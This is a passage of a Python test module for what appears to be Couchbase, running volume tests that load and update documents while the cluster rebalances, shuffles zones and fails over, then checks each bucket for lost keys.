volume.py
from threading import Thread
import threading
from lib.testconstants import STANDARD_BUCKET_PORT
from couchbase_helper.document import DesignDocument, View
from basetestcase import BaseTestCase
from rebalance.rebalance_base import RebalanceBaseTest
from membase.api.rest_client import RestConnection, RestHelper
class VolumeTests(BaseTestCase):
def setUp(self):
super(VolumeTests, self).setUp()
self.zone = self.input.param("zone", 1)
self.recoveryType = self.input.param("recoveryType", "full")
self.ddocs = []
self.default_view_name = "upgrade-test-view"
self.ddocs_num = self.input.param("ddocs-num", 0)
self.view_num = self.input.param("view-per-ddoc", 2)
self.is_dev_ddoc = self.input.param("is-dev-ddoc", False)
self.rate_limit = self.input.param("rate_limit", 100000)
self.batch_size = self.input.param("batch_size", 10000)
self.doc_size = self.input.param("doc_size", 100)
self.loader = self.input.param("loader", "pillowfight")
self.instances = self.input.param("instances", 1)
self.node_out = self.input.param("node_out", 0)
self.threads = self.input.param("threads", 5)
self.use_replica_to = self.input.param("use_replica_to", False)
self.reload_size = self.input.param("reload_size", 50000)
self.initial_load= self.input.param("initial_load", 10000)
def tearDown(self):
super(VolumeTests, self).tearDown()
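# Shell out to cbc-pillowfight to populate the bucket with JSON documents starting
# at the given key offset; auth flags are appended when the cluster version is in
# COUCHBASE_FROM_SPOCK.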
def load(self, server, items, bucket,start_at=0,batch=1000):
import subprocess
from lib.testconstants import COUCHBASE_FROM_SPOCK
rest = RestConnection(server)
num_cycles = int((items // batch )) // 5
cmd = "cbc-pillowfight -U couchbase://{0}/{3} -I {1} -m 10 -M 100 -B {2} --populate-only --start-at {4} --json".format(server.ip, items, batch, bucket, start_at)
if rest.get_nodes_version()[:5] in COUCHBASE_FROM_SPOCK:
cmd += " -u Administrator -P password"
self.log.info("Executing '{0}'...".format(cmd))
rc = subprocess.call(cmd, shell=True)
if rc != 0:
self.fail("Exception running cbc-pillowfight: subprocess module returned non-zero response!")
def check_dataloss(self, server, bucket, num_items):
from couchbase.bucket import Bucket
from couchbase.exceptions import NotFoundError, CouchbaseError
from lib.memcached.helper.data_helper import VBucketAwareMemcached
self.log.info("########## validating data for bucket : {} ###########".format(bucket))
cb_version = RestConnection(server).get_nodes_version()[:3]
if cb_version < "5":
bkt = Bucket('couchbase://{0}/{1}'.format(server.ip, bucket.name), timeout=5000)
else:
bkt = Bucket('couchbase://{0}/{1}'.format(server.ip, bucket.name), username=server.rest_username,
password=server.rest_password, timeout=5000)
rest = RestConnection(self.master)
VBucketAware = VBucketAwareMemcached(rest, bucket.name)
_, _, _ = VBucketAware.request_map(rest, bucket.name)
batch_start = 0
batch_end = 0
batch_size = 10000
errors = []
while num_items > batch_end:
batch_end = batch_start + batch_size
keys = []
for i in range(batch_start, batch_end, 1):
keys.append(str(i).rjust(20, '0'))
try:
bkt.get_multi(keys)
self.log.info("Able to fetch keys starting from {0} to {1}".format(keys[0], keys[len(keys) - 1]))
except CouchbaseError as e:
self.log.error(e)
ok, fail = e.split_results()
if fail:
for key in fail:
try:
bkt.get(key)
except NotFoundError:
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append("Missing key: {0}, VBucketId: {1}".
format(key, vBucketId))
batch_start += batch_size
self.log.info("Total missing keys:{}".format(len(errors)))
self.log.info(errors)
return errors
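# Create the configured number of design documents per bucket, each holding
# self.view_num views generated by make_default_views().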
def create_ddocs_and_views(self):
self.default_view = View(self.default_view_name, None, None)
for bucket in self.buckets:
for i in range(int(self.ddocs_num)):
views = self.make_default_views(self.default_view_name, self.view_num,
self.is_dev_ddoc, different_map=True)
ddoc = DesignDocument(self.default_view_name + str(i), views)
self.ddocs.append(ddoc)
for view in views:
self.cluster.create_view(self.master, ddoc.name, view, bucket=bucket)
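# Volume test driven by the pillowfight loader: keep mutating documents while the
# cluster goes through rebalance-in, rebalance-out, swap-rebalance, zone-shuffle and
# graceful-failover/add-back steps, validating the key space after each step.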
def test_volume_with_rebalance(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
#load initial documents
self.create_ddocs_and_views()
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b)))
for t in load_thread:
t.start()
servers_init = self.servers[:self.nodes_init]
new_server_list=self.servers[0:self.nodes_init]
for t in load_thread:
t.join()
self.sleep(30)
#Reload more data for mutations
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items)))
for t in load_thread:
t.start()
# Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*2)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*2)))
for t in load_thread:
t.start()
#rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init]+ servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out=[self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init, [],
servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*3)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*3)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list)- set(servers_out))
#swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init : self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1) : self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
self.sleep(30)
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*4)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*4)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - {self.master})[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*5)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*5)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
#Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - {self.master})[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*6)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*6)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
#Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*7)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*7)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
#Rebalance out 4 nodes
servers_out = list(set(new_server_list) - {self.master})[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*8)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*8)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info("======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
#Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*9)
self.sleep(30)
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items * 9)))
for t in load_thread:
t.start()
self.shuffle_nodes_between_zones_and_rebalance()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*10)
self.sleep(30)
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items * 10)))
for t in load_thread:
t.start()
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
#Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b, self.num_items*11)
self.sleep(30)
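# Same rebalance sequence as above, but driven by the external high-ops loader
# (scripts/thanosied.py); extra documents are loaded while each rebalance is in
# progress and the final validation fails the test if any keys are missing.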
def test_volume_with_high_ops(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at=0
total_doc=self.num_items
#load initial documents
self.create_ddocs_and_views()
load_thread=[]
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(self.master, bk, self.num_items,
self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
start_at=total_doc
#Reload more data for mutations
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops,
args=(self.master, b, self.num_items,
self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
servers_init = self.servers[:self.nodes_init]
# Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
# Reload more data for mutations
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops,
args=(self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
# rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init] + servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out = [self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# Reload more data for mutations
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
new_server_list = list(set(new_server_list) - set(servers_out))
# swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init: self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1): self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - {self.master})[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
# Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - {self.master})[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
# Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
# Rebalance out 4 nodes
servers_out = list(set(new_server_list) - {self.master})[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info(
"======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
# Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at=self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
self.log.info("####### Shuffling zones and rebalance #######")
self.shuffle_nodes_between_zones_and_rebalance()
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at = self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
# Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at = self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
errors=self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
if len(errors) > 0:
self.fail("data is missing");
self.sleep(30)
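# Variant that repeatedly updates the same document set (tracked via the update
# counter) across the rebalance steps and validates document values as well as
# key presence.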
def test_volume_with_high_ops_update(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at = 0
total_doc = self.num_items
updated=1
# load initial documents
self.create_ddocs_and_views()
load_thread = []
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, bk, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size, instances=self.instances)
self.sleep(30)
#Update all data
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops,
args=(self.master, b, total_doc, total_doc,
self.batch_size, self.threads, start_at, self.instances, updated)))
for t in load_thread:
t.start()
servers_init = self.servers[:self.nodes_init]
#Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
for t in load_thread:
t.join()
#total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True, ops=total_doc,
batch=self.batch_size, instances=self.instances)
updated +=1
#Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances, updated)))
for t in load_thread:
t.start()
# rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init] + servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out = [self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc*updated, batch=self.batch_size, instances=self.instances)
updated +=1
#Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances, updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list) - set(servers_out))
# swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init: self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1): self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc*updated, batch=self.batch_size, instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - {self.master})[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size, instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
# Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - {self.master})[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size, instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
# Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size, instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
# Rebalance out 4 nodes
servers_out = list(set(new_server_list) - {self.master})[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info(
"======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
# Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
self.log.info("####### Shuffling zones and rebalance #######")
self.shuffle_nodes_between_zones_and_rebalance()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
# Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
errors=self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
if len(errors) > 0:
self.fail("data is missing");
def test_volume_with_high_ops_create_update(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at = 0
# load initial documents
self.create_ddocs_and_views()
load_thread = []
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, bk, self.initial_load, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, batch=self.batch_size, instances=self.instances)
self.sleep(30)
total_doc = self.initial_load
start_at=total_doc
#Update initial doc and create more doc
load_thread=[]
create_thread=[]
updated=1
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops,
args=(self.master, b, self.initial_load, self.initial_load,
self.batch_size, self.threads, 0, self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc +=self.num_items
start_at=total_doc
updated +=1
servers_init = self.servers[:self.nodes_init]
#Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated=self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at, updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load*(updated-1), batch=self.batch_size, instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc-self.initial_load,
start_document=self.initial_load, batch=self.batch_size, instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0, self.instances, updated)))
